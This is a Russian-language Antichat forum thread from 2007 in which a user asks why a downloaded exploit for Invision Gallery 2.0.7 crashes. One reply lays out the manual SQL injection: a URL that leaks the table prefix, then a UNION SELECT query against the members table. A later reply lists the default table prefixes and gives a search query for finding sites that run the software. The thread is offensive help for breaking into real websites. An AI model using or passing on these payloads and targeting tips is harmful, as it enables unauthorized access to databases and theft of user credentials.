HOME FORUMS MEMBERS RECENT POSTS LOG IN  
× Авторизация
Имя пользователя:
Пароль:
Нет аккаунта? Регистрация
Баннер 1   Баннер 2
НОВЫЕ ТОРГОВАЯ НОВОСТИ ЧАТ
loading...
Скрыть
Вернуться   ANTICHAT > БЕЗОПАСНОСТЬ И УЯЗВИМОСТИ > Уязвимости > Уязвимости CMS / форумов
Перезагрузить страницу Проблема с сплойтом на Invision Gallery 2.0.7
   
Закрытая тема
 
Опции темы Поиск в этой теме Опции просмотра

Проблема с сплойтом на Invision Gallery 2.0.7
  #1  
Старый 21.05.2007, 00:54
Gatl
Новичок
Регистрация: 28.04.2007
Сообщений: 4
С нами: 10020473

Репутация: 0
По умолчанию Проблема с сплойтом на Invision Gallery 2.0.7
скачал сплойт "Invision Gallery => 2.0.7 ReadFile() & SQL injection exploit" от HellKnights. Откомпилил при попытке заюзать выдает ошибку аля
"Exception 0xc0000005:
Segment violation
Adress: 0x73d5e67d"
и в cmd пишет "abnormal program termination"
В коде сплойта создателями специально допущена ошибка? Вот в общем то помогите решить проблему.
ссылка на сам сплойт
𝕏 Twitter Reddit Telegram Копировать ссылку
Последний раз редактировалось Gatl; 21.05.2007 в 01:04..
 

  #2  
Старый 23.05.2007, 12:56
p-range
Участник форума
Регистрация: 05.02.2006
Сообщений: 168
С нами: 10663526

Репутация: 715
По умолчанию
Если не можешь использовать эксплоит, учись разбирать его и делай все вручную.
Как видно из исходника, здесь присутствуют 2 уязвимости. sql-injection и readfile().
ReadFile() мы трогать не будем, тут и так все понятно.
Рассмотрим sql-injection.
Для начала узнаем префикс таблиц в бд:
Цитата:
http://host/?automodule=gallery&cmd=rate&img=1&rating=1&album=-1%20hellknightscrew
Теперь используем багу так:
Цитата:
http://host/?automodule=gallery&cmd=rate&img=1&rating=1&album=-1+union+select+1,1,1,1,1,1,1,1,1+from+prefix_members+where+id=id
вместо prefix и id подставляем соответствующие значения.
Как видишь, ничего сложного \=
 

  #3  
Старый 24.05.2007, 05:42
MATPOCKuH_82
Новичок
Регистрация: 22.05.2007
Сообщений: 6
С нами: 9985733

Репутация: 0
По умолчанию
Можно два глупых вопроса ? ))

вместо prefix и id подставляем соответствующие значения.

что такое Префикс ???

и как в поисковиках писать что бы найти "Invision Gallery => 2.0.7" ???
 

  #4  
Старый 24.05.2007, 07:48
blackybr
♠ ♦ ♣ ♥
Регистрация: 18.05.2006
Сообщений: 1,828
С нами: 10516826

Репутация: 3742


По умолчанию
префикс по дэфолту обычно или ipb_ или ibf_

http://www.google.com/search?hl=en&q=Invision+Gallery+2.0.7+%C2%A9+2007+ +IPS%2C+Inc.&btnG=Search

клозед. вопрос исчерпан.
__________________
Привет! Меня зовут Джордж, и я хотел бы рассказать вам про реинкарнацию (ц) 2x2
 
Закрытая тема



Предыдущая тема Следующая тема
Похожие темы
Тема Автор Раздел Ответов Последнее сообщение
Проблема со сплойтом для вхзлома ipb 2.0.0 Taylorith Уязвимости CMS / форумов 8 18.02.2007 20:06
invision gallery anakreon Уязвимости CMS / форумов 8 19.01.2007 00:06
Invision Gallery 2.0.7 ReadFile() & SQL injection exploit ~!DoK_tOR!~ Уязвимости CMS / форумов 1 04.01.2007 13:15



Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
 


Быстрый переход




ANTICHAT ™ © 2001- Antichat Kft.